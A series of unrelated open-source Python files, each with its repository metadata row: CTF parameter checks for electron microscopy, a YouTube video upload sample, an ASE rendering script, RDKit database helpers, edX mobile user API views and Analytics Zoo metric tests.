	print "radial 2 complete in %.4f sec"%(time.time()-t0)
	return circular
#===================
def checkParams(focus1=-1.0e-6, focus2=-1.0e-6, pixelsize=1.5e-10,
		cs=2e-3, volts=120000, ampconst=0.07, failParams=False):
	"""
	sanity-check microscope parameters (SI units), printing each value
	when debugging.  Values outside the usual operating range produce a
	warning, or an error (via apDisplay.printError) when failParams is
	True.  Returns nothing.
	"""
	if debug is True:
		print " Defocus1 %.2f microns (underfocus is positive)"%(focus1*1e6)
		if focus1 != focus2:
			print " Defocus2 %.2f microns (underfocus is positive)"%(focus2*1e6)
		print " Pixelsize %.3f Angstroms"%(pixelsize*1e10)
		print " C_s %.1f mm"%(cs*1e3)
		print " High tension %.1f kV"%(volts*1e-3)
		print (" Amp Contrast %.3f (shift %.1f degrees)"
			%(ampconst, math.degrees(-math.asin(ampconst))))
	# defocus values are checked in microns against a 0.1..15 window
	if focus1*1e6 > 15.0 or focus1*1e6 < 0.1:
		msg = "atypical defocus #1 value %.1f microns (underfocus is positve)"%(focus1*1e6)
		if failParams is False:
			apDisplay.printWarning(msg)
		else:
			apDisplay.printError(msg)
	if focus2*1e6 > 15.0 or focus2*1e6 < 0.1:
		msg = "atypical defocus #2 value %.1f microns (underfocus is positve)"%(focus2*1e6)
		if failParams is False:
			apDisplay.printWarning(msg)
		else:
			apDisplay.printError(msg)
	if cs*1e3 > 7.0 or cs*1e3 < 0.4:
		msg = "atypical C_s value %.1f mm"%(cs*1e3)
		if failParams is False:
			apDisplay.printWarning(msg)
		else:
			apDisplay.printError(msg)
	if pixelsize*1e10 > 20.0 or pixelsize*1e10 < 0.1:
		msg = "atypical pixel size value %.1f Angstroms"%(pixelsize*1e10)
		if failParams is False:
			apDisplay.printWarning(msg)
		else:
			apDisplay.printError(msg)
	if volts*1e-3 > 400.0 or volts*1e-3 < 60:
		msg = "atypical high tension value %.1f kiloVolts"%(volts*1e-3)
		if failParams is False:
			apDisplay.printWarning(msg)
		else:
			apDisplay.printError(msg)
	if ampconst < 0.0 or ampconst > 0.5:
		msg = "atypical amplitude contrast value %.3f"%(ampconst)
		if failParams is False:
			apDisplay.printWarning(msg)
		else:
			apDisplay.printError(msg)
	return
#===================
#===================
#===================
if __name__ == "__main__":
	# quick visual self-test: exercise the radial helper, then plot a
	# default 1D CTF curve with matplotlib
	r = generateRadial2d((8,8), 0.1, 0.1)
	radii = generateRadii1d()
	ctf = generateCTF1d(radii)
	from matplotlib import pyplot
	pyplot.plot(radii, ctf, 'r-', )
	pyplot.subplots_adjust(wspace=0.05, hspace=0.05,
		bottom=0.05, left=0.05, top=0.95, right=0.95, )
	pyplot.show()
| vossman/ctfeval | appionlib/apCtf/genctf.py | Python | apache-2.0 | 9,912 | [
"Gaussian"
] | 4b916085627df98592713c7ac508b56d11b8d76334dd27513496955b863b5637 |
#!/usr/bin/python
import httplib
import httplib2
import os
import random
import sys
import time
from apiclient.discovery import build
from apiclient.errors import HttpError
from apiclient.http import MediaFileUpload
from oauth2client.client import flow_from_clientsecrets
from oauth2client.file import Storage
from oauth2client.tools import argparser, run_flow
# Explicitly tell the underlying HTTP transport library not to retry, since
# we are handling retry logic ourselves.
httplib2.RETRIES = 1
# Maximum number of times to retry before giving up.
MAX_RETRIES = 5
# Always retry when these exceptions are raised.
RETRIABLE_EXCEPTIONS = (httplib2.HttpLib2Error, IOError, httplib.NotConnected,
httplib.IncompleteRead, httplib.ImproperConnectionState,
httplib.CannotSendRequest, httplib.CannotSendHeader,
httplib.ResponseNotReady, httplib.BadStatusLine)
# Always retry when an apiclient.errors.HttpError with one of these status
# codes is raised.
RETRIABLE_STATUS_CODES = [500, 502, 503, 504]
# The CLIENT_SECRETS_FILE variable specifies the name of a file that contains
# the OAuth 2.0 information for this application, including its client_id and
# client_secret. You can acquire an OAuth 2.0 client ID and client secret from
# the Google Developers Console at
# https://console.developers.google.com/.
# Please ensure that you have enabled the YouTube Data API for your project.
# For more information about using OAuth2 to access the YouTube Data API, see:
# https://developers.google.com/youtube/v3/guides/authentication
# For more information about the client_secrets.json file format, see:
# https://developers.google.com/api-client-library/python/guide/aaa_client_secrets
CLIENT_SECRETS_FILE = "client_secrets.json"
# This OAuth 2.0 access scope allows an application to upload files to the
# authenticated user's YouTube channel, but doesn't allow other types of access.
YOUTUBE_UPLOAD_SCOPE = "https://www.googleapis.com/auth/youtube.upload"
YOUTUBE_API_SERVICE_NAME = "youtube"
YOUTUBE_API_VERSION = "v3"
# This variable defines a message to display if the CLIENT_SECRETS_FILE is
# missing.
MISSING_CLIENT_SECRETS_MESSAGE = """
WARNING: Please configure OAuth 2.0
To make this sample run you will need to populate the client_secrets.json file
found at:
%s
with information from the Developers Console
https://console.developers.google.com/
For more information about the client_secrets.json file format, please visit:
https://developers.google.com/api-client-library/python/guide/aaa_client_secrets
""" % os.path.abspath(os.path.join(os.path.dirname(__file__),
CLIENT_SECRETS_FILE))
VALID_PRIVACY_STATUSES = ("public", "private", "unlisted")
def get_authenticated_service(args):
  """Authorize via OAuth2 and return a YouTube Data API service object.

  Credentials are cached next to the script in '<script>-oauth2.json';
  the browser-based consent flow runs only when they are missing or
  invalid.  *args* are the parsed oauth2client argparser flags.
  """
  flow = flow_from_clientsecrets(CLIENT_SECRETS_FILE,
    scope=YOUTUBE_UPLOAD_SCOPE,
    message=MISSING_CLIENT_SECRETS_MESSAGE)

  storage = Storage("%s-oauth2.json" % sys.argv[0])
  credentials = storage.get()

  if credentials is None or credentials.invalid:
    credentials = run_flow(flow, storage, args)

  return build(YOUTUBE_API_SERVICE_NAME, YOUTUBE_API_VERSION,
    http=credentials.authorize(httplib2.Http()))
def initialize_upload(youtube, options):
  """Build the video resource from the CLI options and start the upload.

  *youtube* is an authorized API client; *options* holds the parsed
  command-line arguments (file, title, description, category, keywords,
  privacyStatus).  Delegates the actual transfer to resumable_upload().
  """
  tags = None
  if options.keywords:
    # the API expects a list of tags, the CLI takes a comma-separated string
    tags = options.keywords.split(",")

  body=dict(
    snippet=dict(
      title=options.title,
      description=options.description,
      tags=tags,
      categoryId=options.category
    ),
    status=dict(
      privacyStatus=options.privacyStatus
    )
  )

  # Call the API's videos.insert method to create and upload the video.
  insert_request = youtube.videos().insert(
    part=",".join(body.keys()),
    body=body,
    # The chunksize parameter specifies the size of each chunk of data, in
    # bytes, that will be uploaded at a time. Set a higher value for
    # reliable connections as fewer chunks lead to faster uploads. Set a lower
    # value for better recovery on less reliable connections.
    #
    # Setting "chunksize" equal to -1 in the code below means that the entire
    # file will be uploaded in a single HTTP request. (If the upload fails,
    # it will still be retried where it left off.) This is usually a best
    # practice, but if you're using Python older than 2.6 or if you're
    # running on App Engine, you should set the chunksize to something like
    # 1024 * 1024 (1 megabyte).
    media_body=MediaFileUpload(options.file, chunksize=-1, resumable=True)
  )

  resumable_upload(insert_request)
# This method implements an exponential backoff strategy to resume a
# failed upload.
def resumable_upload(insert_request):
response = None
error = None
retry = 0
while response is None:
try:
print "Uploading file..."
status, response = insert_request.next_chunk()
if 'id' in response:
print "Video id '%s' was successfully uploaded." % response['id']
else:
exit("The upload failed with an unexpected response: %s" % response)
except HttpError, e:
if e.resp.status in RETRIABLE_STATUS_CODES:
error = "A retriable HTTP error %d occurred:\n%s" % (e.resp.status,
e.content)
else:
raise
except RETRIABLE_EXCEPTIONS, e:
error = "A retriable error occurred: %s" % e
if error is not None:
print error
retry += 1
if retry > MAX_RETRIES:
exit("No longer attempting to retry.")
max_sleep = 2 ** retry
sleep_seconds = random.random() * max_sleep
print "Sleeping %f seconds and then retrying..." % sleep_seconds
time.sleep(sleep_seconds)
if __name__ == '__main__':
  # command-line interface: --file is mandatory, everything else defaults
  argparser.add_argument("--file", required=True, help="Video file to upload")
  argparser.add_argument("--title", help="Video title", default="Test Title")
  argparser.add_argument("--description", help="Video description",
    default="Test Description")
  argparser.add_argument("--category", default="22",
    help="Numeric video category. " +
      "See https://developers.google.com/youtube/v3/docs/videoCategories/list")
  argparser.add_argument("--keywords", help="Video keywords, comma separated",
    default="")
  argparser.add_argument("--privacyStatus", choices=VALID_PRIVACY_STATUSES,
    default=VALID_PRIVACY_STATUSES[0], help="Video privacy status.")
  args = argparser.parse_args()

  if not os.path.exists(args.file):
    exit("Please specify a valid file using the --file= parameter.")

  youtube = get_authenticated_service(args)
  try:
    initialize_upload(youtube, args)
  except HttpError, e:
    print "An HTTP error %d occurred:\n%s" % (e.resp.status, e.content)
| stu1992/Melbourne-Clouds | upload.py | Python | gpl-3.0 | 6,656 | [
"VisIt"
] | a36404025f01c6920f0cc756422ddcc1066e5cbffad774cc6b23a61c3e49c189 |
# -*- coding: utf-8 -*-
# creates: surface.png
from ase.io import read, write
# Run the relaxation script in this namespace so N2Cu.traj exists in the
# working directory before we try to read it.
exec(compile(open('N2Cu.py').read(), 'N2Cu.py', 'exec'))
# Render the final frame of the trajectory: write surface.pov and trace it
# with POV-Ray, producing the surface.png declared in the header comment.
image = read('N2Cu.traj@-1')
write('surface.pov', image, transparent=False, display=False, run_povray=True)
| misdoro/python-ase | doc/tutorials/surface.py | Python | gpl-2.0 | 243 | [
"ASE"
] | 97fa8f1bd83ec08d8a39bb4aa101d026f118cb054127e3951b8d2502863df81c |
# $Id$
#
# Copyright (C) 2003-2006 greg Landrum and Rational Discovery LLC
#
# @@ All Rights Reserved @@
# This file is part of the RDKit.
# The contents are covered by the terms of the BSD license
# which is included in the file license.txt, found at the root
# of the RDKit source tree.
#
from __future__ import print_function
import sys
from rdkit import RDConfig
from rdkit.Dbase import DbModule
sqlTextTypes = DbModule.sqlTextTypes
sqlIntTypes = DbModule.sqlIntTypes
sqlFloatTypes = DbModule.sqlFloatTypes
sqlBinTypes = DbModule.sqlBinTypes
def GetDbNames(user='sysdba',password='masterkey',dirName='.',dBase='::template1',cn=None):
  """ returns a list of databases that are available

    **Arguments**

      - user: the username for DB access
      - password: the password to be used for DB access
      - dirName: directory searched for file-based databases
      - dBase: template database to connect to (excluded from the result)
      - cn: an optional pre-opened connection to reuse

    **Returns**

      - a list of db names (strings)

  """
  if DbModule.getDbSql:
    if not cn:
      try:
        cn = DbModule.connect(dBase,user,password)
      except Exception:
        # FIX: was a bare "except:", which also swallowed SystemExit and
        # KeyboardInterrupt; catch only genuine errors here.
        print('Problems opening database: %s'%(dBase))
        return []
    c = cn.cursor()
    c.execute(DbModule.getDbSql)
    if RDConfig.usePgSQL:
      names = ['::'+str(x[0]) for x in c.fetchall()]
    else:
      names = ['::'+str(x[0]) for x in c.fetchall()]
      names.remove(dBase)
  elif DbModule.fileWildcard:
    # file-based backend (e.g. sqlite): databases are just files on disk
    import os.path,glob
    names = glob.glob(os.path.join(dirName,DbModule.fileWildcard))
  else:
    names = []
  return names
def GetTableNames(dBase,user='sysdba',password='masterkey',
                  includeViews=0,cn=None):
  """ returns a list of tables available in a database

    **Arguments**

      - dBase: the name of the DB file to be used
      - user: the username for DB access
      - password: the password to be used for DB access
      - includeViews: if this is non-null, the views in the db will
        also be returned
      - cn: an optional pre-opened connection to reuse

    **Returns**

      - a list of table names (strings, upper-cased)

  """
  if not cn:
    try:
      cn = DbModule.connect(dBase,user,password)
    except Exception:
      # FIX: was a bare "except:", which also swallowed SystemExit and
      # KeyboardInterrupt; catch only genuine errors here.
      print('Problems opening database: %s'%(dBase))
      return []
  c = cn.cursor()
  if not includeViews:
    comm = DbModule.getTablesSql
  else:
    comm = DbModule.getTablesAndViewsSql
  c.execute(comm)
  names = [str(x[0]).upper() for x in c.fetchall()]
  # PostgreSQL exposes this system view; hide it from callers
  if RDConfig.usePgSQL and 'PG_LOGDIR_LS' in names:
    names.remove('PG_LOGDIR_LS')
  return names
def GetColumnInfoFromCursor(cursor):
  """ returns a list of (column name, type string) 2-tuples describing the
  columns of an already-executed cursor; type strings are one of 'string',
  'integer', 'float' or 'binary'.

  NOTE: on the sqlite backend this consumes one row from the cursor
  (fetchone) to infer types from the Python values, since sqlite cursors
  do not expose usable type codes.

  NOTE(review): in both branches, an unrecognized type only writes to
  stderr without assigning typeStr, so the append either raises a
  NameError (first column) or reuses the previous column's type.
  """
  if cursor is None or cursor.description is None: return []
  results = []
  if not RDConfig.useSqlLite:
    # map the backend's DB-API type codes onto our four type strings
    for item in cursor.description:
      cName = item[0]
      cType = item[1]
      if cType in sqlTextTypes:
        typeStr='string'
      elif cType in sqlIntTypes:
        typeStr='integer'
      elif cType in sqlFloatTypes:
        typeStr='float'
      elif cType in sqlBinTypes:
        typeStr='binary'
      else:
        sys.stderr.write('odd type in col %s: %s\n'%(cName,str(cType)))
      results.append((cName,typeStr))
  else:
    # sqlite: inspect the Python types of one fetched row instead
    from rdkit.six import PY2, PY3
    r = cursor.fetchone()
    if not r: return results
    for i,v in enumerate(r):
      cName = cursor.description[i][0]
      typ = type(v)
      if typ == str or (PY2 and typ == unicode):
        typeStr='string'
      elif typ == int:
        typeStr='integer'
      elif typ == float:
        typeStr='float'
      elif (PY2 and typ == buffer) or (PY3 and typ in (memoryview, bytes)):
        typeStr='binary'
      else:
        sys.stderr.write('odd type in col %s: %s\n'%(cName,typ))
      results.append((cName,typeStr))
  return results
def GetColumnNamesAndTypes(dBase,table,
                           user='sysdba',password='masterkey',
                           join='',what='*',cn=None):
  """ gets a list of columns available in a DB table along with their types

    **Arguments**

      - dBase: the name of the DB file to be used
      - table: the name of the table to query
      - user: the username for DB access
      - password: the password to be used for DB access
      - join: an optional join clause (omit the verb 'join')
      - what: an optional clause indicating what to select

    **Returns**

      - a list of 2-tuples containing:

          1) column name

          2) column type

  """
  if not cn:
    cn = DbModule.connect(dBase,user,password)
  curs = cn.cursor()
  query = 'select %s from %s'%(what,table)
  if join:
    query = '%s join %s'%(query,join)
  curs.execute(query)
  # delegate the type inspection to the shared cursor helper
  return GetColumnInfoFromCursor(curs)
def GetColumnNames(dBase,table,user='sysdba',password='masterkey',
                   join='',what='*',cn=None):
  """ gets a list of columns available in a DB table

    **Arguments**

      - dBase: the name of the DB file to be used
      - table: the name of the table to query
      - user: the username for DB access
      - password: the password to be used for DB access
      - join: an optional join clause (omit the verb 'join')
      - what: an optional clause indicating what to select
      - cn: an optional pre-opened connection to reuse

    **Returns**

      - a list of column names (strings)

  """
  if not cn:
    cn = DbModule.connect(dBase,user,password)
  c = cn.cursor()
  cmd = 'select %s from %s'%(what,table)
  if join:
    # unlike GetColumnNamesAndTypes, this prepends the 'join' verb only
    # when the caller left it off
    if join.strip().find('join') != 0:
      join = 'join %s'%(join)
    cmd +=' ' + join
  c.execute(cmd)
  # fetch one row so cursor.description is populated on all backends
  c.fetchone()
  desc = c.description
  res = [str(x[0]) for x in desc]
  return res
| strets123/rdkit | rdkit/Dbase/DbInfo.py | Python | bsd-3-clause | 5,347 | [
"RDKit"
] | cb2d1ce09305456af88f274c86e0c46dec552fdb918817b6a2485a47b245df05 |
"""
Views for user API
"""
from django.shortcuts import redirect
from django.utils import dateparse
from rest_framework import generics, views
from rest_framework.decorators import api_view
from rest_framework.response import Response
from opaque_keys.edx.keys import UsageKey
from opaque_keys import InvalidKeyError
from courseware.access import is_mobile_available_for_user
from courseware.model_data import FieldDataCache
from courseware.module_render import get_module_for_descriptor
from courseware.views import get_current_child, save_positions_recursively_up
from student.models import CourseEnrollment, User
from xblock.fields import Scope
from xblock.runtime import KeyValueStore
from xmodule.modulestore.django import modulestore
from xmodule.modulestore.exceptions import ItemNotFoundError
from .serializers import CourseEnrollmentSerializer, UserSerializer
from .. import errors
from ..utils import mobile_view, mobile_course_access
@mobile_view(is_user=True)
class UserDetail(generics.RetrieveAPIView):
    """
    **Use Case**

        Get information about the specified user and
        access other resources the user has permissions for.

        Users are redirected to this endpoint after logging in.

        You can use the **course_enrollments** value in
        the response to get a list of courses the user is enrolled in.

    **Example request**:

        GET /api/mobile/v0.5/users/{username}

    **Response Values**

        * id: The ID of the user.

        * username: The username of the currently logged in user.

        * email: The email address of the currently logged in user.

        * name: The full name of the currently logged in user.

        * course_enrollments: The URI to list the courses the currently logged
          in user is enrolled in.
    """
    # select_related pulls the profile/enrollment rows the serializer
    # renders in the same query
    queryset = (
        User.objects.all()
        .select_related('profile', 'course_enrollments')
    )
    serializer_class = UserSerializer
    # look users up by username (from the URL), not by primary key
    lookup_field = 'username'
@mobile_view(is_user=True)
class UserCourseStatus(views.APIView):
    """
    **Use Case**

        Get or update the ID of the module that the specified user last visited in the specified course.

    **Example request**:

        GET /api/mobile/v0.5/users/{username}/course_status_info/{course_id}

        PATCH /api/mobile/v0.5/users/{username}/course_status_info/{course_id}

        body:
            last_visited_module_id={module_id}
            modification_date={date}

            The modification_date is optional. If it is present, the update will only take effect
            if the modification_date is later than the modification_date saved on the server.

    **Response Values**

        * last_visited_module_id: The ID of the last module visited by the user in the course.

        * last_visited_module_path: The ID of the modules in the path from the
          last visited module to the course module.
    """

    http_method_names = ["get", "patch"]

    def _last_visited_module_path(self, request, course):
        """
        Returns the path from the last module visited by the current user in the given course up to
        the course module. If there is no such visit, the first item deep enough down the course
        tree is used.
        """
        field_data_cache = FieldDataCache.cache_for_descriptor_descendents(
            course.id, request.user, course, depth=2)
        course_module = get_module_for_descriptor(request.user, request, course, field_data_cache, course.id)
        # walk down course -> chapter -> section following saved positions,
        # then reverse so the deepest module comes first
        path = [course_module]
        chapter = get_current_child(course_module, min_depth=2)
        if chapter is not None:
            path.append(chapter)
            section = get_current_child(chapter, min_depth=1)
            if section is not None:
                path.append(section)
        path.reverse()
        return path

    def _get_course_info(self, request, course):
        """
        Returns the course status: the last-visited module id plus the full
        path of module ids from it up to the course module.
        """
        path = self._last_visited_module_path(request, course)
        path_ids = [unicode(module.location) for module in path]
        return Response({
            "last_visited_module_id": path_ids[0],
            "last_visited_module_path": path_ids,
        })

    def _update_last_visited_module_id(self, request, course, module_key, modification_date):
        """
        Saves the module id if the found modification_date is less recent than the passed modification date
        """
        field_data_cache = FieldDataCache.cache_for_descriptor_descendents(
            course.id, request.user, course, depth=2)
        try:
            module_descriptor = modulestore().get_item(module_key)
        except ItemNotFoundError:
            return Response(errors.ERROR_INVALID_MODULE_ID, status=400)
        module = get_module_for_descriptor(request.user, request, module_descriptor, field_data_cache, course.id)
        if modification_date:
            # compare against the stored position's last-modified time and
            # silently ignore stale client updates
            key = KeyValueStore.Key(
                scope=Scope.user_state,
                user_id=request.user.id,
                block_scope_id=course.location,
                field_name='position'
            )
            original_store_date = field_data_cache.last_modified(key)
            if original_store_date is not None and modification_date < original_store_date:
                # old modification date so skip update
                return self._get_course_info(request, course)
        save_positions_recursively_up(request.user, request, field_data_cache, module)
        return self._get_course_info(request, course)

    @mobile_course_access(depth=2)
    def get(self, request, course, *args, **kwargs):  # pylint: disable=unused-argument
        """
        Get the ID of the module that the specified user last visited in the specified course.
        """
        return self._get_course_info(request, course)

    @mobile_course_access(depth=2)
    def patch(self, request, course, *args, **kwargs):  # pylint: disable=unused-argument
        """
        Update the ID of the module that the specified user last visited in the specified course.
        """
        module_id = request.DATA.get("last_visited_module_id")
        modification_date_string = request.DATA.get("modification_date")
        modification_date = None
        if modification_date_string:
            modification_date = dateparse.parse_datetime(modification_date_string)
            # reject unparseable or naive (timezone-less) datetimes
            if not modification_date or not modification_date.tzinfo:
                return Response(errors.ERROR_INVALID_MODIFICATION_DATE, status=400)
        if module_id:
            try:
                module_key = UsageKey.from_string(module_id)
            except InvalidKeyError:
                return Response(errors.ERROR_INVALID_MODULE_ID, status=400)
            return self._update_last_visited_module_id(request, course, module_key, modification_date)
        else:
            # The arguments are optional, so if there's no argument just succeed
            return self._get_course_info(request, course)
@mobile_view(is_user=True)
class UserCourseEnrollmentsList(generics.ListAPIView):
    """
    **Use Case**

        Get information about the courses the currently logged in user is
        enrolled in.

    **Example request**:

        GET /api/mobile/v0.5/users/{username}/course_enrollments/

    **Response Values**

        * created: The date the course was created.
        * mode: The type of certificate registration for this course: honor or
          certified.
        * is_active: Whether the course is currently active; true or false.
        * certificate: Information about the user's earned certificate in the course.
          * url: URL to the downloadable version of the certificate, if exists.
        * course: A collection of data about the course:

          * course_about: The URI to get the data for the course About page.
          * course_updates: The URI to get data for course updates.
          * number: The course number.
          * org: The organization that created the course.
          * video_outline: The URI to get the list of all vides the user can
            access in the course.
          * id: The unique ID of the course.
          * subscription_id: A unique "clean" (alphanumeric with '_') ID of the course.
          * latest_updates: Reserved for future use.
          * end: The end date of the course.
          * name: The name of the course.
          * course_handouts: The URI to get data for course handouts.
          * start: The data and time the course starts.
          * course_image: The path to the course image.
    """
    queryset = CourseEnrollment.objects.all()
    serializer_class = CourseEnrollmentSerializer
    lookup_field = 'username'

    def get_queryset(self):
        # active enrollments for the requested user, newest first
        enrollments = self.queryset.filter(
            user__username=self.kwargs['username'],
            is_active=True
        ).order_by('created').reverse()
        # drop enrollments whose course no longer exists or is not
        # available on mobile for this user
        return [
            enrollment for enrollment in enrollments
            if enrollment.course and is_mobile_available_for_user(self.request.user, enrollment.course)
        ]
@api_view(["GET"])
@mobile_view()
def my_user_info(request):
    """
    Redirect to the currently-logged-in user's info page
    (the user-detail route, resolved with request.user's username).
    """
    return redirect("user-detail", username=request.user.username)
| vismartltd/edx-platform | lms/djangoapps/mobile_api/users/views.py | Python | agpl-3.0 | 9,321 | [
"VisIt"
] | 4d82c2e36d913be394c1ca3c9c75e72220b115b8f7e1051c1685faab4176d586 |
#
# Copyright 2018 Analytics Zoo Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import numpy as np
from test.zoo.pipeline.utils.test_utils import ZooTestCase
from zoo.orca.automl.metrics import ME, MAE, MSE, RMSE, MSLE, R2
from zoo.orca.automl.metrics import MPE, MAPE, MSPE, sMAPE, MDAPE, sMDAPE
from numpy.testing import assert_almost_equal
from numpy.testing import assert_array_almost_equal
class TestMetrics(ZooTestCase):
    """Numeric regression tests for the zoo.orca.automl.metrics functions.

    Each test pins the metric values (usually to 2 decimals) for small
    hand-computed inputs, covering 1-D, multi-output (2-D) and
    higher-dimensional (3-D) arrays, plus a large-array smoke test.
    """

    def setup_method(self, method):
        # No per-test fixtures needed.
        pass

    def teardown_method(self, method):
        # Nothing to clean up.
        pass

    def test_metrics(self, n_samples=50):
        """1-D inputs: every metric against hand-computed expected values."""
        # Constant error of +1 on every sample.
        y_true = np.arange(n_samples) + 1
        y_pred = y_true + 1
        assert_almost_equal(MSE(y_true, y_pred), [1.])
        # MSLE is MSE in log(1 + x) space by definition.
        assert_almost_equal(MSLE(y_true, y_pred),
                            MSE(np.log(1 + y_true),
                                np.log(1 + y_pred)))
        assert_almost_equal(MAE(y_true, y_pred), [1.])
        assert_almost_equal(R2(y_true, y_pred), [0.995], 2)
        assert_almost_equal(sMAPE(y_true, y_pred), [3.89], decimal=2)
        # Mixed-sign values exercise the percentage-based metrics.
        y_true = [3, -0.5, 2, 7]
        y_pred = [2.5, -0.3, 2, 8]
        assert_almost_equal(MAPE(y_true, y_pred), [17.74], decimal=2)
        assert_almost_equal(MPE(y_true, y_pred), [10.6], decimal=2)
        assert_almost_equal(RMSE(y_true, y_pred), [0.57], decimal=2)
        assert_almost_equal(ME(y_true, y_pred), [-0.17], decimal=2)
        assert_almost_equal(MSPE(y_true, y_pred), [5.2], decimal=2)
        assert_almost_equal(MDAPE(y_true, y_pred), [15.48], decimal=2)
        assert_almost_equal(sMDAPE(y_true, y_pred), [7.88], decimal=2)

    def test_multioutput_metrics(self):
        """2-D inputs with 'uniform_average' / 'variance_weighted' reduction."""
        y_true = np.array([[1, 0, 0, 1], [0, 1, 1, 1], [1, 1, 0, 1]])
        y_pred = np.array([[0, 0, 0, 1], [1, 0, 1, 1], [0, 0, 0, 1]])
        assert_almost_equal(MSE(y_true, y_pred, multioutput='uniform_average'),
                            [(1. / 3 + 2. / 3 + 2. / 3) / 4.])
        assert_almost_equal(MSLE(y_true, y_pred, multioutput='uniform_average'),
                            [0.200], decimal=2)
        assert_almost_equal(MAE(y_true, y_pred, multioutput='uniform_average'),
                            [(1. + 2. / 3) / 4.])
        assert_almost_equal(R2(y_true, y_pred, multioutput='variance_weighted'), [1. - 5. / 2])
        assert_almost_equal(R2(y_true, y_pred, multioutput='uniform_average'), [-.875])
        # Same per-row values repeated three times; averages match the 1-D case.
        y_true = ([[3, -0.5, 2, 7], [3, -0.5, 2, 7], [3, -0.5, 2, 7]])
        y_pred = ([[2.5, -0.3, 2, 8], [2.5, -0.3, 2, 8], [2.5, -0.3, 2, 8]])
        assert_almost_equal(sMAPE(y_true, y_pred, multioutput='uniform_average'),
                            [10.19], decimal=2)
        assert_almost_equal(MAPE(y_true, y_pred, multioutput='uniform_average'), [17.74], decimal=2)
        assert_almost_equal(MPE(y_true, y_pred, multioutput='uniform_average'), [10.6], decimal=2)
        assert_almost_equal(RMSE(y_true, y_pred, multioutput='uniform_average'), [0.57], decimal=2)
        assert_almost_equal(ME(y_true, y_pred, multioutput='uniform_average'), [-0.18], decimal=2)
        assert_almost_equal(MSPE(y_true, y_pred, multioutput='uniform_average'), [5.2], decimal=2)
        assert_almost_equal(MDAPE(y_true, y_pred, multioutput='uniform_average'),
                            [17.74], decimal=2)
        assert_almost_equal(sMDAPE(y_true, y_pred, multioutput='uniform_average'),
                            [10.19], decimal=2)

    def test_highdim_metrics(self):
        """3-D inputs with 'uniform_average': same values as the 2-D case."""
        y_true = ([[[3, -0.5], [2, 7]], [[3, -0.5], [2, 7]], [[3, -0.5], [2, 7]]])
        y_pred = ([[[2.5, -0.3], [2, 8]], [[2.5, -0.3], [2, 8]], [[2.5, -0.3], [2, 8]]])
        assert_almost_equal(sMAPE(y_true, y_pred, multioutput='uniform_average'),
                            [10.19], decimal=2)
        assert_almost_equal(MAPE(y_true, y_pred, multioutput='uniform_average'), [17.74], decimal=2)
        assert_almost_equal(MPE(y_true, y_pred, multioutput='uniform_average'), [10.6], decimal=2)
        assert_almost_equal(RMSE(y_true, y_pred, multioutput='uniform_average'), [0.57], decimal=2)
        assert_almost_equal(ME(y_true, y_pred, multioutput='uniform_average'), [-0.18], decimal=2)
        assert_almost_equal(MSPE(y_true, y_pred, multioutput='uniform_average'), [5.2], decimal=2)
        assert_almost_equal(MDAPE(y_true, y_pred, multioutput='uniform_average'),
                            [17.74], decimal=2)
        assert_almost_equal(sMDAPE(y_true, y_pred, multioutput='uniform_average'),
                            [10.19], decimal=2)
        assert_almost_equal(MSE(y_true, y_pred, multioutput='uniform_average'), [0.32], decimal=2)

    def test_highdim_array_metrics(self):
        """3-D inputs with 'raw_values': per-output 2x2 result arrays."""
        y_true = ([[[3, -0.5], [2, 7]], [[3, -0.5], [2, 7]], [[3, -0.5], [2, 7]]])
        y_pred = ([[[2.5, -0.3], [2, 8]], [[2.5, -0.3], [2, 8]], [[2.5, -0.3], [2, 8]]])
        assert_almost_equal(sMAPE(y_true, y_pred, multioutput='raw_values'),
                            [[9.09, 25], [0, 6.67]], decimal=2)
        assert_almost_equal(MAPE(y_true, y_pred, multioutput='raw_values'),
                            [[16.67, 40.00], [0, 14.29]], decimal=2)
        assert_almost_equal(RMSE(y_true, y_pred, multioutput='raw_values'),
                            [[0.5, 0.2], [0, 1]], decimal=2)
        assert_almost_equal(MSE(y_true, y_pred, multioutput='raw_values'),
                            [[0.25, 0.04], [0, 1]], decimal=2)

    def test_multioutput_array_metrics(self):
        """2-D inputs with 'raw_values': one value per output column."""
        y_true = [[1, 2], [2.5, -1], [4.5, 3], [5, 7]]
        y_pred = [[1, 1], [2, -1], [5, 4], [5, 6.5]]
        assert_array_almost_equal(MSE(y_true, y_pred, multioutput='raw_values'),
                                  [0.125, 0.5625], decimal=2)
        assert_array_almost_equal(MAE(y_true, y_pred, multioutput='raw_values'),
                                  [0.25, 0.625], decimal=2)
        assert_array_almost_equal(R2(y_true, y_pred, multioutput='raw_values'),
                                  [0.95, 0.93], decimal=2)
        assert_array_almost_equal(sMAPE(y_true, y_pred, multioutput='raw_values'),
                                  [4.09, 12.83], decimal=2)
        assert_array_almost_equal(MAPE(y_true, y_pred, multioutput='raw_values'),
                                  [7.78, 22.62], decimal=2)
        assert_array_almost_equal(MPE(y_true, y_pred, multioutput='raw_values'),
                                  [2.22, 5.95], decimal=2)
        assert_array_almost_equal(RMSE(y_true, y_pred, multioutput='raw_values'),
                                  [0.35, 0.75], decimal=2)
        assert_array_almost_equal(ME(y_true, y_pred, multioutput='raw_values'),
                                  [0., 0.12], decimal=2)
        assert_array_almost_equal(MSPE(y_true, y_pred, multioutput='raw_values'),
                                  [1.31, 9.16], decimal=2)
        assert_array_almost_equal(MDAPE(y_true, y_pred, multioutput='raw_values'),
                                  [5.56, 20.24], decimal=2)
        assert_array_almost_equal(sMDAPE(y_true, y_pred, multioutput='raw_values'),
                                  [2.63, 8.99], decimal=2)

    def test_large_array_metrics(self):
        """Smoke test on very large inputs.

        NOTE: each (20000000, 4, 1) float32 array is ~320 MB, so this test
        is memory-heavy by design.
        """
        y_true = np.ones((20000000, 4, 1), dtype=np.float32)
        y_pred = np.zeros((20000000, 4, 1), dtype=np.float32)
        assert_array_almost_equal(MAPE(y_true, y_pred, multioutput='raw_values'),
                                  [[100], [100], [100], [100]], decimal=2)
        assert_array_almost_equal(MSE(y_true, y_pred, multioutput='raw_values'),
                                  [[1], [1], [1], [1]], decimal=2)
        assert_array_almost_equal(MAE(y_true, y_pred, multioutput='raw_values'),
                                  [[1], [1], [1], [1]], decimal=2)
